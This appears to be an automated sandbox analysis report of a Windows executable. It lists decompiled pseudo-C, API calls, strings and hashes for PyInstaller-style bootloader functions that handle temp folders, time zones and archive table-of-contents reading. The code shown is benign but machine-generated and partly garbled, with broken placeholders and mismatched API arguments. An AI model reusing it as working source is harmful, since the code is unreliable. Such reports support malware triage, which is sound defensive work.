Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: fc4e3d656f0044a26b74fdf304308c51d512279bf8c0536431011a1210b51cce
Instruction ID: f8fb22f5ef999e2b23ee530ee61776d181edcacfc9b41277b23e90fc15dd07e0
Opcode Fuzzy Hash: fc4e3d656f0044a26b74fdf304308c51d512279bf8c0536431011a1210b51cce
Instruction Fuzzy Hash: 51C1E432B28A4385FB15EFA4C4805AC7761FB99BA8B810276DE1E977D6CF39D065C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D6760 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 139
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00007FF77FF7DA8D6760(void* __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, void* __r9, intOrPtr _a8, char _a16, long long _a24, long long _a32, char _a56, signed int _a8248, void* _a8264) {
				void* __rsi;
				void* _t17;
				long _t21;
				void* _t24;
				void* _t50;
				void* _t60;
				signed long long _t72;
				signed long long _t73;
				intOrPtr _t122;
				void* _t124;
				void* _t126;
				void* _t131;
				void* _t132;
				void* _t133;
				void* _t135;

				_t131 = __r9;
				_t74 = __rbx;
				_t50 = __ecx;
				_a24 = __rbx;
				_a32 = __rbp;
				E00007FF77FF7DA8DAD20(0x2060, __rax, _t132, _t133);
				_t127 = _t126 - __rax;
				_t72 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t73 = _t72 ^ _t126 - __rax;
				_a8248 = _t73;
				_t124 = __rdx;
				_t135 = __rcx;
				if (__rdx == 0) goto 0xda8d67eb;
				E00007FF77FF7DA8D6970(_t73, "TMP");
				E00007FF77FF7DA8D6460(__edx, _t73, __rbx, _t124, __r8);
				if (_t73 == 0) goto 0xda8d68bf;
				_t17 = E00007FF77FF7DA8E6604(_t50, _t73, L"TMP", _t73);
				E00007FF77FF7DA8E3FEC(_t50, _t73, _t73, __r8);
				if (_t17 == 0) goto 0xda8d67f0;
				E00007FF77FF7DA8D2770(_t73, "LOADER: Failed to set the TMP environment variable.\n", _t73, __r8, _t131);
				goto 0xda8d6948;
				_t122 = _a8;
				_t21 = GetTempPathW(??, ??);
				0xda8e9054();
				r9d = _t21;
				_t130 = L"_MEI%d";
				E00007FF77FF7DA8D2470(_t73,  &_a16,  &_a56, L"_MEI%d", _t131);
				E00007FF77FF7DA8E72BC(_t131);
				_t24 = E00007FF77FF7DA8D7810(_t73, _t74, _t73); // executed
				if (_t24 == 0) goto 0xda8d68c6;
				E00007FF77FF7DA8E3FEC(0x1000, _t73,  &_a16, L"_MEI%d");
				if (1 - 5 < 0) goto 0xda8d6820;
				if (_t124 == 0) goto 0xda8d68bf;
				r8d = 0;
				E00007FF77FF7DA8D79A0(_t73, _t74, _t73, "TMP", _t122, L"_MEI%d");
				if (_t122 == 0) goto 0xda8d68a9;
				r8d = 0;
				_t119 = _t73;
				E00007FF77FF7DA8D79A0(_t73, _t74, _t73, _t122, _t122, L"_MEI%d");
				E00007FF77FF7DA8E6604(0, _t73, _t73, _t73);
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, L"_MEI%d");
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, L"_MEI%d");
				E00007FF77FF7DA8E3FEC(0, _t122, _t73, L"_MEI%d");
				goto 0xda8d6948;
				SetEnvironmentVariableW(??, ??);
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, _t130);
				goto 0xda8d6948;
				r8d = 0x1000;
				E00007FF77FF7DA8D7AB0(_t60, _t73, _t135, _t73, _t122, _t124, _t130);
				E00007FF77FF7DA8E3FEC(0, _t73, _t119, _t130);
				if (_t124 == 0) goto 0xda8d6943;
				r8d = 0;
				E00007FF77FF7DA8D79A0(_t73, _t73, _t119, "TMP", _t122, _t130);
				if (_t122 == 0) goto 0xda8d692d;
				r8d = 0;
				E00007FF77FF7DA8D79A0(_t73, _t73, _t119, _t122, _t122, _t130);
				E00007FF77FF7DA8E6604(0, _t73, _t73, _t73);
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, _t130);
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, _t130);
				goto 0xda8d693e;
				SetEnvironmentVariableW(??, ??);
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, _t130);
				return E00007FF77FF7DA8DACF0(1, 0, _a8248 ^ _t127);
			}

0x7ff7da8d6760
0x7ff7da8d6760
0x7ff7da8d6760
0x7ff7da8d6760
0x7ff7da8d6765
0x7ff7da8d6773
0x7ff7da8d6778
0x7ff7da8d677b
0x7ff7da8d6782
0x7ff7da8d6785
0x7ff7da8d678d
0x7ff7da8d6790
0x7ff7da8d6796
0x7ff7da8d679f
0x7ff7da8d67aa
0x7ff7da8d67b5
0x7ff7da8d67c5
0x7ff7da8d67cf
0x7ff7da8d67d6
0x7ff7da8d67df
0x7ff7da8d67e6
0x7ff7da8d67eb
0x7ff7da8d67fa
0x7ff7da8d6800
0x7ff7da8d6805
0x7ff7da8d6808
0x7ff7da8d6819
0x7ff7da8d682a
0x7ff7da8d6835
0x7ff7da8d683c
0x7ff7da8d6845
0x7ff7da8d684f
0x7ff7da8d6854
0x7ff7da8d6856
0x7ff7da8d6862
0x7ff7da8d686a
0x7ff7da8d686c
0x7ff7da8d6874
0x7ff7da8d6877
0x7ff7da8d6885
0x7ff7da8d688d
0x7ff7da8d6895
0x7ff7da8d689d
0x7ff7da8d68a4
0x7ff7da8d68b1
0x7ff7da8d68ba
0x7ff7da8d68c1
0x7ff7da8d68c6
0x7ff7da8d68d2
0x7ff7da8d68da
0x7ff7da8d68e2
0x7ff7da8d68e4
0x7ff7da8d68f0
0x7ff7da8d68f8
0x7ff7da8d68fa
0x7ff7da8d6905
0x7ff7da8d6913
0x7ff7da8d691b
0x7ff7da8d6923
0x7ff7da8d692b
0x7ff7da8d6935
0x7ff7da8d693e
0x7ff7da8d696f

APIs

GetTempPathW.KERNEL32(?,00000000,?,00007FF7DA8D672D), ref: 00007FF7DA8D67FA

Part of subcall function 00007FF7DA8D6970: GetEnvironmentVariableW.KERNEL32(00007FF7DA8D36C7), ref: 00007FF7DA8D69AA
Part of subcall function 00007FF7DA8D6970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7DA8D69C7

Part of subcall function 00007FF7DA8E6604: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E661D

SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7DA8D68B1

Part of subcall function 00007FF7DA8D2770: MessageBoxW.USER32 ref: 00007FF7DA8D2841

Strings

TMP, xrefs: 00007FF7DA8D6798, 00007FF7DA8D6859, 00007FF7DA8D68E7
_MEI%d, xrefs: 00007FF7DA8D6808
LOADER: Failed to set the TMP environment variable., xrefs: 00007FF7DA8D67D8
TMP, xrefs: 00007FF7DA8D67BE

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 3752271684-1116378104
Opcode ID: b5988d867f4919b5775705584ef20fab19ee280ee23fdaadd2eee103ad2ae5d2
Instruction ID: 5bb38dbb4551eec1dfa33633dc302df26c42e671ab7f9b32d310b4fd9fc8495f
Opcode Fuzzy Hash: b5988d867f4919b5775705584ef20fab19ee280ee23fdaadd2eee103ad2ae5d2
Instruction Fuzzy Hash: A351AE11F2964788FE56B72299152BED251BF99BD0FC800B3ED0E47797EE2DE5218320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F4FEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00007FF77FF7DA8F4FEC(void* __eflags, signed int* __rax, long long __rbx, void* __rdx, void* __r9, signed int _a8, signed int _a16, signed int _a24, long long _a32) {
				void* __rsi;
				void* _t21;
				long _t28;
				intOrPtr _t31;
				void* _t33;
				void* _t36;
				void* _t37;
				void* _t38;
				signed int _t40;
				signed int _t49;
				intOrPtr _t59;
				intOrPtr _t60;
				signed int* _t63;
				long long _t69;

				_t64 = __rbx;
				_t63 = __rax;
				_a32 = __rbx;
				E00007FF77FF7DA8F4700(E00007FF77FF7DA8F46F8(_t21));
				_a8 = 0;
				_a16 = 0;
				_a24 = 0;
				if (E00007FF77FF7DA8F4768(_t63,  &_a8) != 0) goto 0xda8f515f;
				if (E00007FF77FF7DA8F4708(_t63,  &_a16) != 0) goto 0xda8f515f;
				if (E00007FF77FF7DA8F4738(_t63,  &_a24) != 0) goto 0xda8f515f;
				_t69 =  *0xda91d2b0; // 0x0
				E00007FF77FF7DA8E9D68(_t63, _t69);
				 *0xda91d2b0 = __rbx; // executed
				_t28 = GetTimeZoneInformation(??); // executed
				if (_t28 == 0xffffffff) goto 0xda8f5134;
				_t49 =  *0xda91d2d0 * 0x3c;
				_t8 = _t64 + 1; // 0x1
				_t59 =  *0xda91d316; // 0xb
				r8d =  *0xda91d324; // 0x0
				 *0xda91d2c0 = _t8;
				_a8 = _t49;
				if (_t59 == 0) goto 0xda8f509e;
				_a8 = r8d * 0x3c + _t49;
				_t60 =  *0xda91d36a; // 0x3
				if (_t60 == 0) goto 0xda8f50b9;
				_t31 =  *0xda91d378; // 0xffffffc4
				if (_t31 == 0) goto 0xda8f50b9;
				_t40 = (_t31 - r8d) * 0x3c;
				goto 0xda8f50bb;
				_a24 = _t40;
				_a16 = _t40;
				r8d = 0x80;
				E00007FF77FF7DA8DC170();
				r8d = 0x80;
				E00007FF77FF7DA8DC170();
				r8d = 0x40;
				E00007FF77FF7DA8DC170();
				r8d = 0x40;
				E00007FF77FF7DA8DC170();
				_t33 = E00007FF77FF7DA8F1BCC(_t40, 0, _t63, __rbx, _t63[2], __rdx, _t63, __r9);
				r9d = _t33;
				E00007FF77FF7DA8F5284(__rbx, 0xda91d2d4,  *_t63, _t63,  *_t63, __r9);
				r9d = _t33;
				_t36 = E00007FF77FF7DA8F46F0(E00007FF77FF7DA8F5284(_t64, 0xda91d328, _t63[2], _t63, _t63[2], __r9));
				 *_t63 = _a8;
				_t37 = E00007FF77FF7DA8F46E0(_t36);
				 *_t63 = _a16;
				_t38 = E00007FF77FF7DA8F46E8(_t37);
				 *_t63 = _a24;
				return _t38;
			}

0x7ff7da8f4fec
0x7ff7da8f4fec
0x7ff7da8f4fec
0x7ff7da8f5003
0x7ff7da8f500e
0x7ff7da8f5014
0x7ff7da8f5017
0x7ff7da8f5021
0x7ff7da8f5032
0x7ff7da8f5043
0x7ff7da8f5049
0x7ff7da8f5050
0x7ff7da8f505c
0x7ff7da8f5063
0x7ff7da8f506c
0x7ff7da8f5072
0x7ff7da8f5079
0x7ff7da8f507c
0x7ff7da8f5083
0x7ff7da8f508a
0x7ff7da8f5090
0x7ff7da8f5093
0x7ff7da8f509b
0x7ff7da8f509e
0x7ff7da8f50a5
0x7ff7da8f50a7
0x7ff7da8f50af
0x7ff7da8f50b4
0x7ff7da8f50b7
0x7ff7da8f50bb
0x7ff7da8f50c0
0x7ff7da8f50cb
0x7ff7da8f50ce
0x7ff7da8f50d7
0x7ff7da8f50dc
0x7ff7da8f50e9
0x7ff7da8f50ee
0x7ff7da8f50f7
0x7ff7da8f50fc
0x7ff7da8f5101
0x7ff7da8f5113
0x7ff7da8f5118
0x7ff7da8f512c
0x7ff7da8f5137
0x7ff7da8f513c
0x7ff7da8f5141
0x7ff7da8f5146
0x7ff7da8f514b
0x7ff7da8f5150
0x7ff7da8f515e

APIs

_get_daylight.LIBCMT ref: 00007FF7DA8F501A

Part of subcall function 00007FF7DA8F4768: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F477C

_get_daylight.LIBCMT ref: 00007FF7DA8F502B

Part of subcall function 00007FF7DA8F4708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F471C

_get_daylight.LIBCMT ref: 00007FF7DA8F503C

Part of subcall function 00007FF7DA8F4738: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F474C

Part of subcall function 00007FF7DA8E9D68: RtlReleasePrivilege.NTDLL(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D7E
Part of subcall function 00007FF7DA8E9D68: GetLastError.KERNEL32(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D88

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7DA8F527C), ref: 00007FF7DA8F5063

Strings

Pacific Daylight Time, xrefs: 00007FF7DA8F5121
Pacific Standard Time, xrefs: 00007FF7DA8F5109

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLastPrivilegeReleaseTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 1182710636-1154798116
Opcode ID: 44d88b89ed70ac353ea7a5ca16a931002f6058608950c07906c59c6ab1c99665
Instruction ID: 0bcb15a6e707eba9853e317cfcc5c56de925f2ef466c3ee07c73118696121731
Opcode Fuzzy Hash: 44d88b89ed70ac353ea7a5ca16a931002f6058608950c07906c59c6ab1c99665
Instruction Fuzzy Hash: F2515B32A086538AF715FF21A8805ADA760BB98788FC44177EE4D83697DF3CE4518760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7790 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF7DA8D77C1
FindClose.KERNELBASE ref: 00007FF7DA8D77D0

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: aaa1e90f7c8ce310ed5e71df168ae59e968dd583b4c87b9c233c193ef6986b6c
Instruction ID: 949b71c2cfa00ef7bffd4edc03bbde1dc9d3bbde27af0cf827a98616833cb483
Opcode Fuzzy Hash: aaa1e90f7c8ce310ed5e71df168ae59e968dd583b4c87b9c233c193ef6986b6c
Instruction Fuzzy Hash: 87F086229186428BFBA19F64E445769F350BB84724FC40636D96D026D5DF3CD0598B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DAE40 Relevance: 3.0, APIs: 2, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00007FF77FF7DA8DAE40(intOrPtr* __rax, long long __rbx, void* __r8, long long _a8) {
				char _v24;
				void* _t9;
				void* _t10;
				void* _t11;
				signed short _t21;
				void* _t23;
				void* _t27;
				intOrPtr _t37;
				intOrPtr* _t56;
				intOrPtr* _t57;
				void* _t70;

				_t58 = __rbx;
				_t56 = __rax;
				E00007FF77FF7DA8DB7E0(); // executed
				SetUnhandledExceptionFilter(??);
				goto 0xda8e8a44;
				asm("int3");
				asm("int3");
				asm("int3");
				_a8 = __rbx;
				_t9 = E00007FF77FF7DA8DB2CC(1); // executed
				if (_t9 == 0) goto 0xda8dafa8;
				dil = 0;
				_v24 = dil;
				_t10 = E00007FF77FF7DA8DB290();
				_t37 =  *0xda91c560; // 0x2
				if (_t37 == 1) goto 0xda8dafb3;
				if (_t37 != 0) goto 0xda8daee4;
				 *0xda91c560 = 1;
				_t11 = E00007FF77FF7DA8E85C4(__rbx, 0xda8fa468, 0xda8fa4a8); // executed
				if (_t11 == 0) goto 0xda8daec5;
				goto 0xda8daf9d;
				E00007FF77FF7DA8E8580(_t58, 0xda8fa450, 0xda8fa460); // executed
				 *0xda91c560 = 2;
				goto 0xda8daeec;
				dil = 1;
				_v24 = dil;
				E00007FF77FF7DA8DB5E4(E00007FF77FF7DA8DB43C(_t10, 0xda8fa460));
				if ( *_t56 == 0) goto 0xda8daf1f;
				if (E00007FF77FF7DA8DB3A4(_t56, _t56) == 0) goto 0xda8daf1f;
				r8d = 0;
				_t57 =  *_t56;
				E00007FF77FF7DA8DB5EC( *0xda8fa428(_t70));
				if ( *_t57 == 0) goto 0xda8daf41;
				if (E00007FF77FF7DA8DB3A4(_t57, _t57) == 0) goto 0xda8daf41;
				E00007FF77FF7DA8E88D4( *_t57);
				_t21 = E00007FF77FF7DA8DB748(0xda8fa460);
				E00007FF77FF7DA8E852C();
				r9d = _t21 & 0x0000ffff;
				_t78 = _t57;
				_t23 = E00007FF77FF7DA8D1000(_t57); // executed
				if (E00007FF77FF7DA8DB78C(_t57) == 0) goto 0xda8dafbd;
				if (dil != 0) goto 0xda8daf77;
				E00007FF77FF7DA8E88B8(0x7ff7da8d0000, 0xda8fa460, _t57);
				E00007FF77FF7DA8DB460(1, 0);
				_t27 = _t23;
				if (E00007FF77FF7DA8DB78C(_t57) == 0) goto 0xda8dafc5;
				if (_v24 != 0) goto 0xda8daf9b;
				E00007FF77FF7DA8E88A8(0x7ff7da8d0000, 0xda8fa460, _t78);
				return _t27;
			}

0x7ff7da8dae40
0x7ff7da8dae40
0x7ff7da8dae44
0x7ff7da8dae49
0x7ff7da8dae54
0x7ff7da8dae59
0x7ff7da8dae5a
0x7ff7da8dae5b
0x7ff7da8dae5c
0x7ff7da8dae6b
0x7ff7da8dae72
0x7ff7da8dae78
0x7ff7da8dae7b
0x7ff7da8dae80
0x7ff7da8dae87
0x7ff7da8dae90
0x7ff7da8dae98
0x7ff7da8dae9a
0x7ff7da8daeb2
0x7ff7da8daeb9
0x7ff7da8daec0
0x7ff7da8daed3
0x7ff7da8daed8
0x7ff7da8daee2
0x7ff7da8daee4
0x7ff7da8daee7
0x7ff7da8daef3
0x7ff7da8daeff
0x7ff7da8daf0b
0x7ff7da8daf0d
0x7ff7da8daf16
0x7ff7da8daf1f
0x7ff7da8daf2b
0x7ff7da8daf37
0x7ff7da8daf3c
0x7ff7da8daf41
0x7ff7da8daf49
0x7ff7da8daf4e
0x7ff7da8daf51
0x7ff7da8daf5d
0x7ff7da8daf6b
0x7ff7da8daf70
0x7ff7da8daf72
0x7ff7da8daf7b
0x7ff7da8daf80
0x7ff7da8daf8d
0x7ff7da8daf94
0x7ff7da8daf96
0x7ff7da8dafa7

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00007FF7DA8DAE49
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E8A58

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
String ID:
API String ID: 59578552-0
Opcode ID: 41e9a32394b2b47377862a5720a33bb80c0e77fc514b686da979f7caaa2f6200
Instruction ID: e907f0bfa4647146e50ff27059062b69f084d159d0509ebf60a1d0cb41e0a547
Opcode Fuzzy Hash: 41e9a32394b2b47377862a5720a33bb80c0e77fc514b686da979f7caaa2f6200
Instruction Fuzzy Hash: 42E0E630E5D143CAF91A7765484207CA4513F65320FE401FBD52D852C3DD5E66B15772

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D17B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E00007FF77FF7DA8D17B0(long long __rbx, signed long long* __rcx, long long _a16) {
				signed int _v16;
				char _v21;
				unsigned long long _v24;
				void* __rdi;
				void* _t40;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t69;
				signed long long _t84;
				signed long long _t85;
				unsigned long long _t86;
				unsigned long long _t87;
				intOrPtr* _t90;
				long long* _t93;
				void* _t102;
				void* _t110;
				char* _t118;
				void* _t124;
				unsigned long long _t125;
				long long _t127;
				void* _t128;
				void* _t131;
				void* _t132;

				_a16 = __rbx;
				_t84 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t85 = _t84 ^ _t128 - 0x00000030;
				_v16 = _t85;
				_t93 = __rcx;
				if ( *__rcx != 0) goto 0xda8d17ef;
				_t3 = _t93 + 0x78; // 0x78
				_t40 = E00007FF77FF7DA8D3C90(_t85, _t3, "rb"); // executed
				 *__rcx = _t85;
				if (_t85 == 0) goto 0xda8d1842;
				_t86 = "MEI"; // 0xe0b0a0b0049454d
				_v24 = _t86;
				r8d = 8;
				_t87 = _t86 >> 0x18;
				_v21 = _t40 + 0xc;
				E00007FF77FF7DA8D7170(_t87, __rcx, _t85,  &_v24, _t124, _t131); // executed
				_t125 = _t87;
				if (_t87 == 0) goto 0xda8d1842;
				r8d = 0;
				_t43 = E00007FF77FF7DA8DF884(_t87, _t93,  *_t93, _t125); // executed
				if (_t43 >= 0) goto 0xda8d184c;
				_t118 = "Failed to seek to cookie position!\n";
				E00007FF77FF7DA8D24D0(_t43, _t87, "fseek", _t118, _t131, _t132);
				goto 0xda8d19b3;
				_t8 = _t118 - 0x57; // 0x1, executed
				r8d = _t8;
				E00007FF77FF7DA8DF54C(_t118, _t131,  *_t93); // executed
				if (_t87 - 1 >= 0) goto 0xda8d1884;
				_t102 = "fread";
				E00007FF77FF7DA8D24D0(_t87 - 1, _t87, _t102, "Failed to read cookie!\n", _t131,  *_t93);
				goto 0xda8d19b3;
				r8d = 0;
				asm("bswap eax");
				asm("bswap eax");
				_t51 =  *((intOrPtr*)(_t93 + 0x34));
				asm("bswap ecx");
				asm("bswap eax");
				_t127 = _t125 - _t102 + 0x58;
				 *((intOrPtr*)(_t93 + 0x34)) = _t51;
				 *((long long*)(_t93 + 8)) = _t127;
				 *((intOrPtr*)(_t93 + 0x507c)) = 0;
				 *0xda90dc74 = _t51;
				E00007FF77FF7DA8DF884(_t87, _t93,  *_t93, _t127); // executed
				0xda8e4000();
				 *(_t93 + 0x10) = _t87;
				if (_t87 != 0) goto 0xda8d18fe;
				E00007FF77FF7DA8D24D0(_t87, _t87, "malloc", "Could not allocate buffer for TOC!\n", _t131,  *_t93);
				goto 0xda8d19b3;
				r8d = 1;
				E00007FF77FF7DA8DF54C( *((intOrPtr*)(_t93 + 0x30)), _t131,  *_t93);
				if (_t87 - 1 >= 0) goto 0xda8d1925;
				goto 0xda8d186e;
				 *((long long*)(_t93 + 0x18)) =  *((intOrPtr*)(_t93 + 0x30)) +  *(_t93 + 0x10);
				if (E00007FF77FF7DA8DF2C0( *((intOrPtr*)(_t93 + 0x30)) +  *(_t93 + 0x10),  *_t93) == 0) goto 0xda8d1950;
				E00007FF77FF7DA8D2770( *((intOrPtr*)(_t93 + 0x30)) +  *(_t93 + 0x10), "Error on file.\n", "Could not read full TOC!\n", _t131,  *_t93);
				goto 0xda8d19b3;
				_t90 =  *(_t93 + 0x10);
				if (_t90 -  *((intOrPtr*)(_t93 + 0x18)) >= 0) goto 0xda8d19a1;
				asm("o16 nop [eax+eax]");
				_t69 =  *_t90;
				asm("bswap ecx");
				asm("bswap ecx");
				asm("bswap ecx");
				asm("bswap edx");
				 *_t90 = _t69;
				_t110 = _t69 + _t90;
				if (_t110 -  *(_t93 + 0x10) < 0) goto 0xda8d1995;
				if (_t110 -  *((intOrPtr*)(_t93 + 0x18)) < 0) goto 0xda8d1960;
				goto 0xda8d19a1;
				E00007FF77FF7DA8D2770(_t110, "Cannot read Table of Contents.\n", "Could not read full TOC!\n", _t131,  *_t93);
				if ( *_t93 == 0) goto 0xda8d19b1; // executed
				E00007FF77FF7DA8DF1FC(_t110, _t93,  *_t93, _t127); // executed
				 *_t93 = _t127;
				return E00007FF77FF7DA8DACF0(0,  *((intOrPtr*)(_t90 + 0xc)), _v16 ^ _t128 - 0x00000030);
			}

0x7ff7da8d17b0
0x7ff7da8d17ba
0x7ff7da8d17c1
0x7ff7da8d17c4
0x7ff7da8d17c9
0x7ff7da8d17d2
0x7ff7da8d17d4
0x7ff7da8d17df
0x7ff7da8d17e4
0x7ff7da8d17ed
0x7ff7da8d17ef
0x7ff7da8d17fb
0x7ff7da8d1800
0x7ff7da8d1806
0x7ff7da8d180c
0x7ff7da8d1810
0x7ff7da8d1815
0x7ff7da8d181b
0x7ff7da8d1820
0x7ff7da8d1826
0x7ff7da8d182d
0x7ff7da8d182f
0x7ff7da8d183d
0x7ff7da8d1847
0x7ff7da8d1858
0x7ff7da8d1858
0x7ff7da8d185c
0x7ff7da8d1865
0x7ff7da8d186e
0x7ff7da8d1875
0x7ff7da8d187f
0x7ff7da8d1887
0x7ff7da8d188d
0x7ff7da8d1895
0x7ff7da8d189a
0x7ff7da8d189d
0x7ff7da8d18a7
0x7ff7da8d18a9
0x7ff7da8d18ad
0x7ff7da8d18b0
0x7ff7da8d18b6
0x7ff7da8d18bc
0x7ff7da8d18cc
0x7ff7da8d18d5
0x7ff7da8d18da
0x7ff7da8d18e1
0x7ff7da8d18f1
0x7ff7da8d18f9
0x7ff7da8d1902
0x7ff7da8d190e
0x7ff7da8d1917
0x7ff7da8d1920
0x7ff7da8d1930
0x7ff7da8d193b
0x7ff7da8d1944
0x7ff7da8d194e
0x7ff7da8d1950
0x7ff7da8d1958
0x7ff7da8d195a
0x7ff7da8d1963
0x7ff7da8d1965
0x7ff7da8d196d
0x7ff7da8d1975
0x7ff7da8d197a
0x7ff7da8d197c
0x7ff7da8d1981
0x7ff7da8d198b
0x7ff7da8d1991
0x7ff7da8d1993
0x7ff7da8d199c
0x7ff7da8d19a7
0x7ff7da8d19a9
0x7ff7da8d19ae
0x7ff7da8d19ca

APIs

_fread_nolock.LIBCMT ref: 00007FF7DA8D185C
_fread_nolock.LIBCMT ref: 00007FF7DA8D190E

Part of subcall function 00007FF7DA8DF2C0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8DF2D4

Part of subcall function 00007FF7DA8D2770: MessageBoxW.USER32 ref: 00007FF7DA8D2841

Strings

Could not read full TOC!, xrefs: 00007FF7DA8D1919
Could not allocate buffer for TOC!, xrefs: 00007FF7DA8D18E3
Cannot read Table of Contents., xrefs: 00007FF7DA8D1995
Failed to seek to cookie position!, xrefs: 00007FF7DA8D182F
Failed to read cookie!, xrefs: 00007FF7DA8D1867
fread, xrefs: 00007FF7DA8D186E
Error on file., xrefs: 00007FF7DA8D193D
malloc, xrefs: 00007FF7DA8D18EA
fseek, xrefs: 00007FF7DA8D1836
MEI, xrefs: 00007FF7DA8D17EF

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

